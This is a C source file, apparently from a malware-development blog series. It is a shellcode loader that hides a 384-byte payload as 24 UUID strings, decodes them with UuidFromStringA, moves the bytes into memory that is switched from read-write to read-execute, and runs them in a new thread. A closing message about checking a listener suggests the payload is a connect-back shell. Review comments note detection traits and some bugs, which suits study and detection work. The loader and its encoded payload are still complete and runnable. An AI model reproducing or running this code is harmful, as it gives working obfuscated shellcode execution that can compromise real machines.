It’s A Simple Process Injection Technique, Nothing Interesting Here
#include <stdio.h>
#include <Windows.h>
#include <wincrypt.h>
#include <stdlib.h> // for malloc
/* Function-pointer type matching rpcrt4's UuidFromStringA. It is declared here
   because the routine is looked up by name with GetProcAddress at run time
   rather than called through a normal import; the name string
   "UuidFromStringA" therefore still appears in the binary even though the
   import table does not list it. */
typedef RPC_STATUS (WINAPI *fnUuidFromStringA)(RPC_CSTR uuidText, UUID *outUuid);
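/**
 * Decode an array of UUID-formatted strings into one contiguous byte buffer.
 *
 * Each string is handed to rpcrt4's UuidFromStringA, which writes the 16-byte
 * binary UUID into the next slot of the output buffer. The encoding is a
 * reversible representation only (no key is involved), so the output is the
 * exact byte blob that was split into UUID strings. For triage, the pairing of
 * many UUID-formatted string constants with a run-time lookup of
 * "UuidFromStringA" is the recognisable static trait of this layer.
 *
 * @param uuids            Array of NUL-terminated UUID strings.
 * @param uuidsize         Number of entries in @p uuids.
 * @param deobfuscated     Receives the heap buffer on success (NULL on failure).
 *                         The caller owns it and releases it with
 *                         HeapFree(GetProcessHeap(), 0, ptr).
 * @param deobfuscatedsize Receives the buffer size in bytes (0 on failure).
 * @return TRUE when every entry decoded, FALSE otherwise.
 */
BOOL UUIDDefuscation(char* uuids[], SIZE_T uuidsize, PBYTE* deobfuscated, SIZE_T* deobfuscatedsize)
{
    BOOL ok = FALSE;
    HMODULE hRpcrt4 = NULL;
    fnUuidFromStringA pUuidFromStringA = NULL;
    PBYTE pBuffer = NULL;
    PBYTE pCursor = NULL;
    SIZE_T BufferSize = 0;
    RPC_STATUS status = RPC_S_OK;

    if (uuids == NULL || deobfuscated == NULL || deobfuscatedsize == NULL)
    {
        printf("[!] UUIDDefuscation Called With A NULL Argument\n");
        return FALSE;
    }

    /* Give the caller defined outputs on every failure path. */
    *deobfuscated = NULL;
    *deobfuscatedsize = 0;

    /* Reject counts whose byte size would wrap SIZE_T and under-allocate. */
    if (uuidsize > ((SIZE_T)-1) / sizeof(UUID))
    {
        printf("[!] UUID Count %zu Is Too Large\n", uuidsize);
        return FALSE;
    }

    /* Check the module handle separately so a failed load is reported as such
       instead of being passed to GetProcAddress as NULL. */
    hRpcrt4 = LoadLibrary(TEXT("RPCRT4"));
    if (hRpcrt4 == NULL)
    {
        printf("[!] LoadLibrary Failed With Error : %lu \n", GetLastError());
        return FALSE;
    }

    pUuidFromStringA = (fnUuidFromStringA)GetProcAddress(hRpcrt4, "UuidFromStringA");
    if (pUuidFromStringA == NULL)
    {
        printf("[!] GetProcAddress Failed With Error : %lu \n", GetLastError());
        goto cleanup;
    }

    BufferSize = uuidsize * sizeof(UUID);
    pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BufferSize);
    if (pBuffer == NULL)
    {
        printf("[!] HeapAlloc Failed With Error: %lu\n", GetLastError());
        goto cleanup;
    }

    pCursor = pBuffer;
    for (SIZE_T i = 0; i < uuidsize; i++)
    {
        /* One string in, sizeof(UUID) bytes out. */
        status = pUuidFromStringA((RPC_CSTR)uuids[i], (UUID*)pCursor);
        if (status != RPC_S_OK)
        {
            printf("[!] fnUuidFromStringA Failed At [%s] With Error 0x%08lX\n",
                   uuids[i] != NULL ? uuids[i] : "(null)", (unsigned long)status);
            goto cleanup;
        }

        /* Hex dump of the slot that was just decoded. */
        for (SIZE_T j = 0; j < sizeof(UUID); j++)
        {
            printf("%02x ", pCursor[j]);
        }
        printf("\n");

        pCursor += sizeof(UUID);
    }

    /* Success: ownership of pBuffer passes to the caller. */
    *deobfuscated = pBuffer;
    *deobfuscatedsize = BufferSize;
    ok = TRUE;

cleanup:
    if (!ok && pBuffer != NULL)
    {
        HeapFree(GetProcessHeap(), 0, pBuffer);
    }
    /* The resolved pointer is not used after this point, so drop the reference. */
    FreeLibrary(hRpcrt4);
    return ok;
}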
/*
 * Encoded payload: 24 UUID-formatted strings, each standing for 16 raw bytes
 * (24 * 16 = 384 bytes once decoded by UUIDDefuscation).
 *
 * Byte order follows the binary UUID layout that UuidFromStringA writes: the
 * first three fields are stored little-endian and the last two groups are
 * taken in string order. The first entry, "008FE8FC-0000-8960-E531-D2648B52308B",
 * therefore decodes to FC E8 8F 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B.
 *
 * The last entry ends in a run of 0x90 bytes, which looks like padding added
 * to reach a multiple of 16 (not confirmed from this page).
 *
 * NOTE(review): what the decoded bytes do is not established by this listing.
 * main() prints "Please Check Your Listener!", so presumably this is a
 * connect-back stage; confirm by decoding it in an isolated analysis setup.
 * For static detection, a table of UUID-shaped strings in the data section
 * next to the "UuidFromStringA" name string is the trait to match on.
 */
char* UuidArray[24] = {
"008FE8FC-0000-8960-E531-D2648B52308B", "528B0C52-3114-8BFF-7228-0FB74A2631C0", "7C613CAC-2C02-C120-CF0D-01C74975EF52", "5710528B-428B-013C-D08B-407885C0744C", "588BD001-8B20-1848-5001-D385C9743C49", "318B348B-01FF-31D6-C0AC-C1CF0D01C738", "03F475E0-F87D-7D3B-2475-E0588B582401", "0C8B66D3-8B4B-1C58-01D3-8B048B01D089", "5B242444-615B-5A59-51FF-E0585F5A8B12", "FFFF80E9-5DFF-3368-3200-00687773325F", "774C6854-0726-E889-FFD0-B89001000029", "685054C4-8029-006B-FFD5-6A0A680A14C9", "000268A7-5C11-E689-5050-505040504050", "DF0FEA68-FFE0-97D5-6A10-56576899A574", "85D5FF61-74C0-FF0A-4E08-75ECE8670000", "6A006A00-5604-6857-02D9-C85FFFD583F8", "8B367E00-6A36-6840-0010-0000566A0068", "E553A458-D5FF-5393-6A00-5653576802D9", "D5FF5FC8-F883-7D00-2858-68004000006A", "0B685000-0F2F-FF30-D557-68756E4D61FF", "FF5E5ED5-240C-850F-70FF-FFFFE99BFFFF", "29C301FF-75C6-C3C1-BBE0-1D2A0A68A695", "D5FF9DBD-063C-0A7C-80FB-E07505BB4713", "006A6F72-FF53-90D5-9090-909090909090"
};
/*
 * Entry point: decodes UuidArray to raw bytes, copies them into a freshly
 * allocated region, marks that region executable and starts a thread on it.
 *
 * Every call below targets the current process (GetCurrentProcess(), a local
 * VirtualAlloc, CreateThread), so the listing shows in-process execution; no
 * second process is opened or written to.
 *
 * What an analyst or sensor can observe, in order:
 *   1. a private read-write allocation the size of the decoded blob,
 *   2. a write into that region,
 *   3. a protection change of the same region to PAGE_EXECUTE_READ,
 *   4. a thread whose start address lies inside that private region, i.e. not
 *      inside any mapped image.
 * The split into RW followed by RX avoids a single RWX allocation, but the
 * writable-to-executable transition on private memory is typically recorded by
 * endpoint telemetry and is visible to memory scanners afterwards.
 *
 * Returns EXIT_SUCCESS after the thread has ended and memory is released,
 * EXIT_FAILURE if decoding or any of the checked API calls fails.
 *
 * NOTE(review): every string below ends in "\\n", which prints a literal
 * backslash followed by 'n' rather than a newline; this may be an escaping
 * artefact of the page. GetLastError() returns a DWORD but is printed with %d.
 * The fixed banner and "[+]"/"[!]" status strings are plain ASCII constants in
 * the binary and are usable as static match strings.
 */
int main()
{
printf("Rem01x Malware Development Journey\\n");
// Element count of the encoded table (24 in this file).
SIZE_T numofUUIDs = sizeof(UuidArray) / sizeof(UuidArray[0]);
PBYTE pDeobfuscatedPayload = NULL;
SIZE_T sDeobfuscatedSize = 0; // Use 0 instead of NULL
// Stage 1: turn the UUID strings back into bytes on the process heap.
if (!UUIDDefuscation(UuidArray, numofUUIDs, &pDeobfuscatedPayload, &sDeobfuscatedSize))
{
printf("[!] UUID Deobfuscation Failed\\n");
return EXIT_FAILURE;
}
printf("[+] Deobfuscated The Payload At: 0x%p And Size %zu\\n", pDeobfuscatedPayload, sDeobfuscatedSize);
// Stage 2: private region, initially read-write only (not executable yet).
PVOID pShellcode = VirtualAlloc(NULL, sDeobfuscatedSize, (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
if (pShellcode == NULL)
{
printf("[!] VirtualAlloc Failed With Error : %d \\n", GetLastError());
HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated memory before exit
return EXIT_FAILURE;
}
printf("[+] Successfully Allocated Memory For The Shellcode At: %p\\n", pShellcode);
// Stage 3: copy the decoded bytes into the region. The target handle is the
// current process, so this is a local copy made through the cross-process API.
// NOTE(review): the return value is ignored and bytesWritten is never read, so
// a failed or short write goes unnoticed and the later stages still run.
SIZE_T bytesWritten;
WriteProcessMemory(GetCurrentProcess(), pShellcode, pDeobfuscatedPayload, sDeobfuscatedSize, &bytesWritten);
DWORD dwOldProtection = 0;
// Stage 4: switch the region from read-write to read-execute.
if (!VirtualProtect(pShellcode, sDeobfuscatedSize, PAGE_EXECUTE_READ, &dwOldProtection))
{
printf("[!] VirtualProtect Failed With Error : %d \\n", GetLastError());
VirtualFree(pShellcode, 0, MEM_RELEASE); // Free allocated memory
HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated memory before exit
return EXIT_FAILURE;
}
printf("[+] Successfully Changed The Memory Permissions From Read And Write To Read And Execute\\n");
// Stage 5: new thread in this process whose start routine is the region itself.
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pShellcode, NULL, 0, NULL);
if (hThread == NULL)
{
printf("[!] CreateThread Failed With Error : %d \\n", GetLastError());
VirtualFree(pShellcode, 0, MEM_RELEASE); // Free allocated memory
HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated memory before exit
return EXIT_FAILURE;
}
printf("[+] Successfully Executed The Thread. Please Check Your Listener!\\n");
// Blocks with no timeout: the cleanup below runs only if the thread ends.
WaitForSingleObject(hThread, INFINITE);
// Cleanup
CloseHandle(hThread); // Close thread handle
if (pDeobfuscatedPayload)
{
HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated payload memory
printf("[+] Cleaned Up The Memory\\n");
}
if (pShellcode)
{
VirtualFree(pShellcode, 0, MEM_RELEASE); // Free shellcode memory
printf("[+] Cleaned Up The Shellcode Memory\\n");
}
return EXIT_SUCCESS;
}

